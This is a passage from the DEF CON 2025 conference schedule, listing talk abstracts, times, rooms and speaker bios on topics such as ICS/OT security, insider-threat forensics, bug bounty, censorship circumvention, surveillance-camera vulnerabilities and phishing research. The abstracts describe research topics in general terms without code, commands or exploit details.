Kind of! We accept nominees earlier in the year and then publish and announce them at Summercon every year. Summercon will be held in Brooklyn, NY on 7/11/2025. Members of the community and past Pwnie Award Winners then vote on who should win each category. Those winners are then announced during the show at DEF CON.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 17:10-17:40 PDT


Title: The Quantum Shift: Practical Post-Quantum Risk: Algorithms, Infrastructure, and Transition
When: Saturday, Aug 9, 17:10 - 17:40 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
Speakers:Sean Prescott,Ted Carefoot

SpeakerBio:  Sean Prescott
No BIO available
SpeakerBio:  Ted Carefoot, CEO at Scope Technologies
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Saturday - 11:00-11:59 PDT


Title: The social engineering industry
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

How Scam compounds in South East Asia are driving a wave of scams globally


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Saturday - 13:45-14:15 PDT


Title: The Things know What You Did Last Session
When: Saturday, Aug 9, 13:45 - 14:15 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

I will cover the tools available in the corporate network, the limitations of remote investigations, and the signatures of threat actors. All examples are cases I have actively worked in the past two years. This will range from the individual threat- timecard fraud identified thru network logs which led to the geolocation of an automated fingerprint device hidden in a facility to large numbers of contractors working in denied areas to ultimately the identification and mitigation of North Korean IT worker fraud within the network. 1. Speaker intro and brief background 1. On-site contractor must be on site daily between 9-5 but there was little work. They connected an older generation iPhone to the visitor network and hid it within a box in a cubicle away from foot traffic. 1. The device had the timecard app for $company which required a manual fingerprint touch/swipe geolocated to the customer site daily. 2. The contractor automated a device to have a synthetic flesh covering over a robotic finger which would press log in at 0900 and logout at 5pm monday-friday 3. The device was discovered by janitors and assumed to be an explosive device at first 4. Picture analysis revealed the make/model of the iPhone 5. I gained access to the visitor Wifi logs, found the MAC address of the iPhone/device name (named $contractor name) and the traffic going to the contractor timesheet website Other devices were also found with similar configurations for the user and his manager

2.How I was introduced to the IoT village thru chip off extraction of Chinese voting machine in 2022 by the IOT experts Description of voting machine prototype from china 4g connectivity, bluetooth, wifi but no true data ports for analysis Chip off extraction by IoT village (videos) end result of the analysis and where the images went for national security 3. North Korean IT Fraudulent worker hunting 1. Micro level- piKVM switch hunting on individual network detection level, now turned to an email alert via date ubea 2. Hints and clues via digital forensics- devices added to the workstation that are not related to the users 1. Kim’s iPhones connecting to George’s virtual machine 2. Multiple user devices (verified thru MAC address) connecting to the same workstation 3. Timecards being updated in HR systems in beijing/NK time zone on emulators 1. Can see it’s a linux device android phone whereas most legitimate users are either android or iPhone. Connecting to Wifi VPN router for all connections and forgetting 2fa is tied to the local infrastructure


4. User was being terminated from company A as a fraudulent worker and company B/C screens were in the background. With the screen shot time provided by our partner, I executed a windows event code search in splunk for devices locked within the window of the termination from company A. We ultimately found a full stack dev fitting the description of NKIT suspects with an Astrill VPN. While hunting for this user, we identified one working out of China and spoofing their location. The humint interview, while far from the iOt arena, revealed the user’s deception as they would not open the windows locally to prove they are in the same geographic time zone

SpeakerBio:  Will Baggett, Will Baggett (@iOSforensic) is a Lead Investigator for Digital Forensics and Insider Threat at a Fiscal Infrastructure organization. He is also Director of Digital Forensics at Operation Safe Escape (volunteer role), a non-profit organization providing assistance to victims of domestic abuse.
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 12:00-12:20 PDT


Title: The Ultimate Hack: Applying Lessons Learned from the loss of TITAN to Maritime Cybersecurity
When: Friday, Aug 8, 12:00 - 12:20 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

The 2023 loss of the Titan submersible was a tragic wake-up call that exposed dangerous gaps in safety oversight, design practices, and regulation in extreme maritime environments. As leader of the international search-and-rescue response, I witnessed firsthand the human consequences of operating innovative technologies in legal gray zones without sufficient safeguards. Titan's creators leveraged regulatory loopholes to push design boundaries, dismissing expert warnings and bypassing standard safety certifications. This same pattern of unchecked innovation, inadequate oversight, and hubris mirrors critical vulnerabilities now facing maritime cybersecurity. Just as Titan’s passengers unknowingly placed trust in untested designs, vessels today rely increasingly on digitally interconnected yet inadequately secured systems, creating risks that could lead to catastrophic failures. Harsh environmental conditions and remote operations compound the potential impacts of maritime cyber incidents, paralleling Titan’s tragic fate. This paper connects the painful lessons from the Titan tragedy to urgent maritime cybersecurity needs—arguing for clear international regulation, rigorous independent testing, and proactive incident response planning—to prevent similar disasters at sea.

References:

This presentation will be a combination of my own experiences, the evidence collected during the TITAN Marine Board of Investigation and reports from U.S. Coast Guard cyber command and other sources regarding maritime cybersecurity. The TITAN investigation is available here: link

Maritime Cybersecurity references are available here: link

SpeakerBio:  Rear Admiral John Mauger, USCG (Ret.)

Rear Admiral John W. Mauger, USCG (Ret.), is a seasoned executive with over 33 years of leadership experience in the maritime industry, national security, and cyber operations. As Commander of the First Coast Guard District, he led over 12,000 people and oversaw critical port operations in New England, deploying innovative technologies like counter-drone systems to enhance security. RADM Mauger's leadership during the June 2023 TITAN capsule search and recovery at the TITANIC site highlighted his ability to lead complex crises in the international spotlight. At U.S. Cyber Command, RADM Mauger revolutionized cyber training by developing a cloud-based environment that modernized cyber exercises and increased readiness. Earlier in his career, he led domestic and international regulatory programs. His work protected mariners and the environment, created new markets for alternative fuels, and established a new international code to safeguard vital Polar regions. Now leading (PORTS) LLC, John uses his diverse expertise to help clients plan for and navigate complex challenges in the maritime and critical infrastructure industries while enhancing personnel and team performance through effective training.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Wednesday - 11:00-17:59 PDT


Title: The Unofficial DEF CON Shoot
When: Wednesday, Aug 6, 11:00 - 17:59 PDT
Where: Other / See Description

Description:

The DEF CON Shoot is a public event that happens just prior to the DEF CON hacker conference in Las Vegas, Nevada. It is an opportunity to see and shoot some of the guns belonging to your friends while taking pride in showing and firing your own steel, as well, in a relaxed and welcoming atmosphere. We choose a spot, then we rent tables, canopies, and bring all the necessary safety equipment and amenities. All you need to bring yourself and (optionally) your firearms. New shooters and veterans both attend regularly. You can attend with your firearms, of course, but folk without guns of their own in Vegas may have the opportunity to try gear from others in attendance. Admission costs are intentionally kept low, just so we can break even on expenses for the amenities provided.

Offsite - Pro Gun Vegas Address: 12801 US 95 South. Boulder City, NV 89005


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Sunday - 12:30-12:59 PDT


Title: The Worst ICS/OT Love Story Ever Told
When: Sunday, Aug 10, 12:30 - 12:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

The world of securing OT/ICS is changing FAST!

And we are not prepared.

Prior to the Colonial Pipeline incident in 2021, we focused on protecting against state adversaries.

Afterwards, we shifted to focusing on protecting against ransomware operators and hacktivists.

Now in 2025, we see more alignment between state adversaries, ransomware operators and hacktivists.

A significant shift in the landscape we are not ready for.

Advanced capabilities and tools in the hands of every day attackers with intermediate to no skill?

Are we prepared today for what's coming?

No.

But we can be.

And we'll talk about how.

SpeakerBio:  Mike Holcomb, Flour

Mike Holcomb is the Fellow of Cybersecurity and the ICS/OT Cybersecurity Global Lead for Fluor, one of the world’s largest engineering, procurement, and construction companies. His current role provides him with the opportunity to work in securing some of the world’s largest ICS/OT environments, from power plants and commuter rail to manufacturing facilities and refineries. As part of his community efforts, Michael founded the BSidesICS/OT and BSides Greenville conferences along with the UpstateSC ISSA Chapter. He has his Masters degree in ICS/OT cybersecurity from the SANS Technology Institute. Additionally, he maintains cyber security and ICS/OT certifications such as the GRID, CISSP, GICSP, ISA 62443, and more.

He posts regularly on LinkedIn and YouTube to help others learn more about securing ICS/OT and critical infrastructure.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 15:30-15:59 PDT


Title: The Year of the Bounty Desktop: Bugs from Binaries
When: Friday, Aug 8, 15:30 - 15:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Desktop applications are the forgotten attack surface of bug bounty hunting. They're usually out of scope, but they talk to assets that aren't. In this talk, I'll share how I've earned bounties by targeting desktop apps directly or leveraging them to find bugs in paying assets.

SpeakerBio:  Parsia "CryptoGangsta" Hakimian, Offensive Security Engineer at Microsoft

Parsia is an offensive security "engineer" at Microsoft. While not a full-time hunter, he has learned a great deal from hunts and the bug bounty community. He spends most of his time reading code and experimenting with static and dynamic analysis -- but wishing he was gaming.

Parsia has previously presented at DEF CON's main venue and the AppSec Village. When not breaking (or fixing) things, he plays videogames, D&D, spends time with family outside - and, as his wife jokes, "subjects himself to the tax and immigration systems of US and Canada".


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Saturday - 15:00-15:30 PDT


Title: There and Back Again: Discovering OT devices across protocol gateways
When: Saturday, Aug 9, 15:00 - 15:30 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

Operational Technology (OT) describes devices and protocols used to control real-world operations: factories, assembly lines, medical equipment, and so on.

For decades, this technology was isolated (more or less) from the wider world, using custom protocols and communications media. However, over the past 15 - 20 years, these devices have started using commodity protocols and media more and more. This means that these devices are now using the standard TCP/IP protocol suite, a concept referred to as "OT/IT convergence."

This convergence has obvious benefits, making these devices cheaper and more manageable. However, it also makes them more accessible to attackers, and their security posture has often not kept up.

As part of this convergence process, many devices are connected via protocol gateways. These gateways speak TCP/IP, and then translate communications to proprietary OT protocols (or simply provide a NAT-style private network within an OT device rack).

This talk discusses techniques for detecting devices on the "other side" of these gateways. It begins with a brief introduction to the history of OT, moving on to the OT/IT convergence phenomenon. It then discusses the issue of protocol translation and provides two practical examples of discovering assets across gateways: CIP (Common Industrial Protocol) message forwarding and DNP3 (Distributed Network Protocol, version 3) address discovery.

These techniques are provided as examples to illustrate the issue of OT device discovery, and to encourage the audience to perform further research in how these sorts of devices may be discovered on networks and, ultimately, protected.

SpeakerBio:  Rob King, Runzero

Rob King is the Director of Security Research at runZero. Over his career Rob has served as a senior researcher with KoreLogic, the architect for TippingPoint DVLabs, and helped get several startups off the ground. Rob helped design SC Magazine's Data Leakage Prevention Product of the Year for 2010, and was awarded the 3Com Innovator of the Year Award in 2009. He has been invited to speak at BlackHat, DEF CON, Shmoocon, SANS Network Security, and USENIX.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 09:00-09:45 PDT


Title: TheTimeMachine
When: Saturday, Aug 9, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

TheTimeMachine is an offensive OSINT and bug bounty recon suite that revives forgotten endpoints from the past using the Wayback Machine. Designed for red teamers, CTF players, and bounty hunters, it automates historical data mining, subdomain extraction, parameter harvesting, and endpoint fuzzing for vulnerabilities like XSS, open redirect, LFI, and SQLi. The suite also integrates a powerful JWT analysis engine to extract, decode, and highlight juicy fields from tokens hidden in archived URLs. TheTimeMachine also hunts leaked archives and even verifies whether archived snapshots are still live. With colorful terminal output, modular CLI tools, and support for custom wordlists, this tool resurrects the buried past to exploit the forgotten future. Dead links don’t die here—they just get reconned harder.

Speakers:Arjun "T3R4_KAAL" Chaudhary,Anmol "Fr13nd0x7f" K. Sachan

SpeakerBio:  Arjun "T3R4_KAAL" Chaudhary

Arjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.

SpeakerBio:  Anmol "Fr13nd0x7f" K. Sachan

Anmol is a security consultant at NetSPI with expertise in web, API, AI/ML, and network penetration testing as well as attack surface management and offensive security automation. He has reported to over 50 organizations via VDPs, discovered multiple CVEs, and co-founded cybersecurity communities like CIA Conference and OWASP Chandigarh. He is also an active open-source contributor — his tools like WayBackLister, ThreatTracer, The Time Machine, and more have collectively earned over 600 GitHub stars. He is passionate about red teaming and building tools that enhance real-world security assessments.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 09:00-09:45 PDT


Title: TheTimeMachine
When: Friday, Aug 8, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

TheTimeMachine is an offensive OSINT and bug bounty recon suite that revives forgotten endpoints from the past using the Wayback Machine. Designed for red teamers, CTF players, and bounty hunters, it automates historical data mining, subdomain extraction, parameter harvesting, and endpoint fuzzing for vulnerabilities like XSS, open redirect, LFI, and SQLi. The suite also integrates a powerful JWT analysis engine to extract, decode, and highlight juicy fields from tokens hidden in archived URLs. TheTimeMachine also hunts leaked archives and even verifies whether archived snapshots are still live. With colorful terminal output, modular CLI tools, and support for custom wordlists, this tool resurrects the buried past to exploit the forgotten future. Dead links don’t die here—they just get reconned harder.

Speakers:Arjun "T3R4_KAAL" Chaudhary,Anmol "Fr13nd0x7f" K. Sachan

SpeakerBio:  Arjun "T3R4_KAAL" Chaudhary

Arjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.

SpeakerBio:  Anmol "Fr13nd0x7f" K. Sachan

Anmol is a security consultant at NetSPI with expertise in web, API, AI/ML, and network penetration testing as well as attack surface management and offensive security automation. He has reported to over 50 organizations via VDPs, discovered multiple CVEs, and co-founded cybersecurity communities like CIA Conference and OWASP Chandigarh. He is also an active open-source contributor — his tools like WayBackLister, ThreatTracer, The Time Machine, and more have collectively earned over 600 GitHub stars. He is passionate about red teaming and building tools that enhance real-world security assessments.


Return to Index    -    Add to Google    -    ics Calendar file

BHV - Friday - 17:00-17:30 PDT


Title: They deployed Health AI on us. We’re bringing the rights & red teams.
When: Friday, Aug 8, 17:00 - 17:30 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

AI is rapidly reshaping healthcare—from diagnostics to mental health chatbots to surveillance inside EHRs—often without patient consent or clear oversight. The Patient AI Rights Initiative (https://lightcollective.org/patient-ai-rights/) lays out the first patient-authored ethical framework for Health AI. Now it’s time to test it like any other system: for failure, bias, and exploitability.

We’ll introduce the 7 Patient AI Rights and challenge participants to stress test them through the lens of security research. Working in small groups, you'll choose a Right and explore how it could break down in the real world.

Together, we’ll co-create early prototypes for a “Red Teaming Toolkit for Health AI” to evaluate Health AI systems based on the priorities of the people most impacted by them: patients.

This session is ideal for patient activists, engineers, bioethicists, and anyone interested in building accountable, rights-respecting AI systems from the outside in.

SpeakerBio:  Andrea Downing
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 13:00-13:45 PDT


Title: Thinking Like a Hacker in the Age of AI
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

The accelerating evolution of technology, specifically AI, has created a "meta-system" so complex and intertwined with all domains of knowledge and human life that it effectively operates on a meta-level, shaping our reality and exceeding our control. The meta-system requires collaboration among all of its parts for effect management. We need to think on a meta-level because the meta-system is thinking about us in its own unique terms. We must adopt a "hacker" mindset – thinking critically, creatively, collaboratively, and systematically – to navigate this new reality.

SpeakerBio:  Richard "neuralcowboy" Thieme

Richard Thieme who has published numerous articles and short stories, thirteen books, and has delivered hundreds of speeches. His recent Mobius Trilogy illuminates the impacts of security and intelligence work on practitioners. The trilogy was lauded by a 20-year CIA veteran as one of the five best works of serious spy fiction--ever. He spoke in 2022 at Def Con - which he is an uber-contributor-for the 26th year and keynoted the first two Black Hats. He has keynoted security conferences in 15 countries and clients range from GE, Microsoft, Medtronic, Bank of America, Allstate Insurance, and Johnson Controls to the NSA, FBI, US Dept of the Treasury. Los Alamos National Lab, the Pentagon Security Forum, and the US Secret Service.


Return to Index    -    Add to Google    -    ics Calendar file

PLV - Friday - 13:45-14:30 PDT


Title: Third-Party Access Granted: A Postmortem on Student Privacy and the Exploit That’s Still in Production
When: Friday, Aug 8, 13:45 - 14:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:
SpeakerBio:  Sharlene Toney
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MHV - Friday - 15:00-15:45 PDT


Title: Threat Dynamics on the Seas
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

The tides are changing. The seas are the key frontier for power projection and commerce by nations, companies, and militaries -- and surveillance and cybersecurity tradecraft are rapidly reshaping sea-side threat dynamics. Join three of the biggest minds national security to explore threats to the maritime domain as the strategic centerpiece for conflict in the digital age. From port cranes to drug smuggling, and Navy ships to undersea cables, the fight is everywhere.

Speakers:RADM John Mauger,Michael Sulmeyer,Adam Segal

SpeakerBio:  RADM John Mauger, PORTS llcUSCG (ret.)

Rear Admiral John W. Mauger, USCG (Ret.) is a seasoned executive with over 33 years of leadership experience in the maritime industry, national security, and cyber operations. Known for his foresight, innovative approach to problem solving, and ability to drive change, John has left an indelible mark on every role he’s undertaken—from commanding complex Coast Guard operations to shaping the future of cyber defense.

As Commander of the First Coast Guard District, he led over 12,000 people and oversaw critical port operations in New England, deploying innovative technologies like counter-drone systems to enhance security. John's leadership during the TITAN capsule search and recovery at the TITANIC site highlighted his ability to lead complex crises in the international spotlight.

At U.S. Cyber Command, John revolutionized cyber training, developing a cloud-based environment that modernized cyber exercises and increased readiness. John also served as the Coast Guard’s first Executive Champion the National Naval Officers Association, mentoring future leaders and driving organizational change.

Earlier in his career, John led key regulatory projects for both domestic and international shipping. His work protected mariners and the environment, created new markets for alternative fuels, and established a new international code to safeguard vital Polar regions.

Now leading (PORTS) LLC, John uses his diverse expertise to help clients plan for and navigate complex challenges in the maritime and critical infrastructure industries while enhancing personnel and team performance through effective training.

SpeakerBio:  Michael Sulmeyer, US DoD (ret.), Georgetown School of Foreign Service

Michael Sulmeyer will start as Professor of the Practice at the School of Foreign Service's Security Studies Program in the fall of 2025. He most recently served as the first Assistant Secretary of Defense for Cyber Policy and as Principal Cyber Advisor to the Secretary of defense. He has held other senior roles involving cyber-related issues with the U.S. Army, the Office of the Secretary of Defense, U.S. Cyber Command and the National Security Council. In academia, he was a Senior Fellow with Georgetown's Center for Security and Emerging Technology. He holds a doctorate in politics from Oxford University where he was a Marshall Scholar, and a law degree from Stanford Law School.

SpeakerBio:  Adam Segal, Council on Foreign Relations

Adam Segal is the Ira A. Lipman chair in emerging technologies and national security and director of the Digital and Cyberspace Policy program at the Council on Foreign Relations (CFR). From April 2023 to June 2024, Segal was a senior advisor in the State Department's Bureau of Cyberspace and Digital Policy, where he led the development of the United States International Cyberspace and Digital Policy. An expert on security issues, technology development, and Chinese domestic and foreign policy, Segal was the project director for the CFR-sponsored Independent Task Force reports Confronting Reality in Cyberspace, Innovation and National Security, Defending an Open, Global, Secure, and Resilient Internet, and Chinese Military Power. His book The Hacked World Order: How Nations Fight, Trade, Maneuver, and Manipulate in the Digital Age (PublicAffairs, 2016) describes the increasingly contentious geopolitics of cyberspace. Segal is also the author of Advantage: How American Innovation Can Overcome the Asian Challenge (W.W. Norton, 2011) and Digital Dragon: High-Technology Enterprises in China (Cornell University Press, 2003), as well as several articles and book chapters on Chinese technology policy.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 16:00-16:30 PDT


Title: To Pay or Not to Pay? The Battle Between Bug Bounty & Vulnerability Disclosure Programs
When: Friday, Aug 8, 16:00 - 16:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Running parallel vulnerability submission programs - one paid, one unpaid - is like managing two restaurants with the same kitchen but different menus and expectations. Researchers have strong feelings on this topic but so do businesses operating and funding the programs.

SpeakerBio:  Aaron "scriptingxss" Guzman, CISO at Cisco

Aaron serves as Cisco's Network Devices CISO, securing millions of on-premises and cloud-managed products powering global internet infrastructure. With over 10 years in crowdsourced security—both as researcher and program owner—he drives Cisco's public bug bounty program while launching comprehensive vulnerability disclosure capabilities.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Sunday - 12:00-12:30 PDT


Title: TotalTest 2.Oh!: Unleashing a Testing Program to Break Smarter, Measure Better, and Fund Your Fixes
When: Sunday, Aug 10, 12:00 - 12:30 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Production halted. SCADA alarms blaring. The CEO demands answers. Your theoretical cyberattack? It just became reality. Point-in-time penetration tests are fundamentally inadequate against today's advanced persistent threats. This talk outlines a framework to build an intelligence-led, integrated attack and crisis simulation program, not just a reactive security strategy.

Drawing from our extensive experience (including hundreds of red team engagements for some of the world's largest organizations, with anonymized real-world case studies), we will unveil TotalTest – a revolutionary, metrics-driven framework that transforms breach simulations from isolated exercises into a continuous, strategic program for unparalleled organizational resilience.

SpeakerBio:  Nebu Varghese, FTI Consulting LLP - Senior Director, EMEA Offensive Security Leader

Nebu Varghese is a Senior Director in FTI Consulting’s Cybersecurity practice and is based in London. Mr. Varghese has more than 13 years of multi-functional cybersecurity experience, blending deep technical expertise with strong academic credentials. He has led global teams and complex matters across 28 countries, in sectors including Financial Services, Private Equity, TMT, Manufacturing, and Critical National Infrastructure. Mr. Varghese specialises in executing and managing the delivery of offensive security testing (ethical hacking or penetration testing) engagements for organisations across the globe. He serves on the UK National Cyber Security Centre (NCSC) Security Testing Expert Group, collaborating with industry experts to draft practical and valuable best practice guidance that informs and guides both the NCSC and the wider ICS industry.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Thursday - 15:00-20:59 PDT


Title: Toxic BBQ
When: Thursday, Aug 7, 15:00 - 20:59 PDT
Where: Other / See Description

Description:

Join the humans of Vegas at the next inCARNEtion of your Thursday welcome party. Enjoy fewer walls and more garden as we meet AFK in the shade of Sunset Park. Burgers and dogs are provided; you bring everything else (specialties, drinks, labor, and donations). We're expanding our grills to over 40 sq ft of heat with space for veggies and your own personal creations.

Grab flyers from an Info Booth after Linecon, or watch #ToxicBBQ on the socials for the latest news.

Offsite @ Sunset Park, Foxtail Pavilion (36.0636, -115.1178)


Return to Index    -    Add to Google    -    ics Calendar file

DDV - Friday - 13:00-13:59 PDT


Title: Tracking 300k+ drives: What we’ve learned after 13 years
When: Friday, Aug 8, 13:00 - 13:59 PDT
Where: LVCCWest-Level2-W225 - Map

Description:

Backblaze Drive Stats is an open dataset that has tracked hard drive and SSD reliability across our data centers since 2013. This session covers recent backend upgrades—including a modular versioning system and migration to Snowflake with Trino and Iceberg—that improved data processing and failure validation. We'll also share updated AFR trends by drive model and size, SSD tracking challenges, and share how drive insights have underpinned performance improvements in data centers.

Speakers:Pat Patterson,Stephanie Doyle

SpeakerBio:  Pat Patterson, Chief Technical Evangelist at Backblaze

Pat Patterson is the chief technical evangelist at Backblaze. Over his three decades in the industry, Pat has built software and communities at Sun Microsystems, Salesforce, StreamSets, and Citrix. In his role at Backblaze, he creates and delivers content tailored to the needs of the hands-on technical professional, acts as the “voice of the developer” on the Product team, and actively participates in the wider technical community. Outside the office, Pat runs far, having completed ultramarathons up to the 50 mile distance. Catch up with Pat via Bluesky or LinkedIn.

SpeakerBio:  Stephanie Doyle, Associate Editor & Writer at Backblaze

Stephanie is the Associate Editor & Writer at Backblaze. She specializes in taking complex topics and writing relatable, engaging, and user-friendly content. You can most often find her reading in public places, and can connect with her on LinkedIn.


Return to Index    -    Add to Google    -    ics Calendar file

DDV - Saturday - 13:00-13:59 PDT


Title: Tracking 300k+ drives: What we’ve learned after 13 years
When: Saturday, Aug 9, 13:00 - 13:59 PDT
Where: LVCCWest-Level2-W225 - Map

Description:

Backblaze Drive Stats is an open dataset that has tracked hard drive and SSD reliability across our data centers since 2013. This session covers recent backend upgrades—including a modular versioning system and migration to Snowflake with Trino and Iceberg—that improved data processing and failure validation. We'll also share updated AFR trends by drive model and size, SSD tracking challenges, and share how drive insights have underpinned performance improvements in data centers.

Speakers:Pat Patterson,Stephanie Doyle

SpeakerBio:  Pat Patterson, Chief Technical Evangelist at Backblaze

Pat Patterson is the chief technical evangelist at Backblaze. Over his three decades in the industry, Pat has built software and communities at Sun Microsystems, Salesforce, StreamSets, and Citrix. In his role at Backblaze, he creates and delivers content tailored to the needs of the hands-on technical professional, acts as the “voice of the developer” on the Product team, and actively participates in the wider technical community. Outside the office, Pat runs far, having completed ultramarathons up to the 50 mile distance. Catch up with Pat via Bluesky or LinkedIn.

SpeakerBio:  Stephanie Doyle, Associate Editor & Writer at Backblaze

Stephanie is the Associate Editor & Writer at Backblaze. She specializes in taking complex topics and writing relatable, engaging, and user-friendly content. You can most often find her reading in public places, and can connect with her on LinkedIn.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 14:00-14:45 PDT


Title: TSPU: Russia's Firewall and Defending Against the Future of Digital Repression
When: Saturday, Aug 9, 14:00 - 14:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

When the first measurement studies of the GFW came out in the early 2000s, computation and power consumption were 30,000X greater than they are today. Because of this, China’s GFW resided deeper in the network and further away from homes and data centers. The substantial increase in computational efficiency has made processing and filtering in-path and near connection end-points viable while the volume of network traffic in today’s Internet has made this design a virtual necessity. Russia’s censorship apparatus, the TSPU, has emerged as a state-of-the-art system, on par with the GFW, and a potentially more significant threat, particularly for users of Russian apps and data centers. There are two reasons for this. First, Russia’s design, which places censors in-path and closer to end-hosts (residential modems and data center connections), permits more granular, targeted attacks. Second, according to the Russian government, sanctions have compelled them to build their own certificate authority and require all Russian software to trust this certificate authority. Combining these two factors implies major threats to users interacting with Russian data centers and software. Fortunately, research has identified cases where the TSPU can be circumvented. New tools based on these ideas could be the future of circumvention.

References:

1 2 3 4 5 6 7 8 9 10 11 12

Censorship of VPNs today, link

SpeakerBio:  Benjamin "bmixonbaca" Mixon-Baca

I am a security researcher focused on Internet Freedom, censorship circumvention, and pwning middleboxes, firewalls, and other devices that are supposed to keep me "safe". I have developed attacks against VPN software. The one relevant to this presentation is CVE-2021-3773. This vulnerability affects VPNs but is actually because of issues in the firewall/connection tracking framework (e.g., Netfilter) of the underlying OS running the VPN. An attacker can use this vulnerability to redirect packets in various ways and can even let an attacker escalate from adjacent to-in-path between the victim and VPN server. I applied insights I gained while developing this attack to testing the TSPU and was able to develop bypass strategies. This is because the underlying design of connection tracking frameworks, such as how they track TCP states and direction, is basically the same for both network layer VPNs like OpenVPN and WireGuard and firewalls like the TSPU.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 12:00-12:59 PDT


Title: Tunnelpocalypse
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Deep dive into GRE Tunnel encapsulation vulnerability

SpeakerBio:  Rich Compton, Comcast
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 10:00-10:20 PDT


Title: Turning Camera Surveillance on its Axis
When: Saturday, Aug 9, 10:00 - 10:20 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

What are the consequences if an adversary compromises the surveillance cameras of thousands of leading Western organizations and companies? As trust in Chinese-made IoT devices declines, organizations face limited alternatives—especially in video surveillance. Many governments have already banned Dahua and Hikvision products in sensitive facilities, further narrowing their choices. This concern drove our research, revealing that surveillance platforms can be double-edged swords.

We focused on Axis Communications, a major player in video surveillance widely used by U.S. government agencies, schools, medical facilities, and Fortune 500 companies.

In our talk, we will present an in-depth analysis of the Axis.Remoting communication protocol, uncovering critical vulnerabilities that allow attackers to achieve pre-auth RCE on Axis platforms. This access could serve as a gateway into an organization’s internal network via its surveillance infrastructure. Additionally, we identified a novel technique for passive data exfiltration, enabling attackers to map organizations using this equipment—potentially aiding in targeted attacks.

SpeakerBio:  Noam Moshe

Noam Moshe is a vulnerability researcher and Team Lead at Claroty Team82. Noam specializes in vulnerability research, web applications pentesting, malware analysis, network forensics and ICS/SCADA security. In addition, Noam presented in well-known Hacking conferences like Blackhat/Defcon, as well as won Master of Pwn at Pwn2Own Miami 2023


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 16:00-16:45 PDT


Title: Turning Microsoft's Login Page into our Phishing Infrastructure
When: Saturday, Aug 9, 16:00 - 16:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Microsoft Entra ID – one of the most used identity providers in the enterprise market. Or from our perspective: the most targeted platform in phishing attacks. Getting our phishing infrastructure up and running is usually the easy part. The real challenge is often keeping it online long enough to deliver the phishing link and collect credentials without detection before it gets burned.

But what if we could use Microsoft's official login domain for our phishing purposes? And no, I'm not talking about the heavily mitigated OAuth Consent or Device Code Phishing techniques, or simply hosting a phishing page on Azure Web App subdomains. I'm talking about stealing credentials directly from the legitimate login.microsoftonline.com domain.

In this talk, I will share multiple novel methods that can be used to achieve this. And the best of all? It all relies on legitimate functionality, making it mostly unpatchable. 😈

References:

SpeakerBio:  Keanu "RedByte" Nys, Spotit

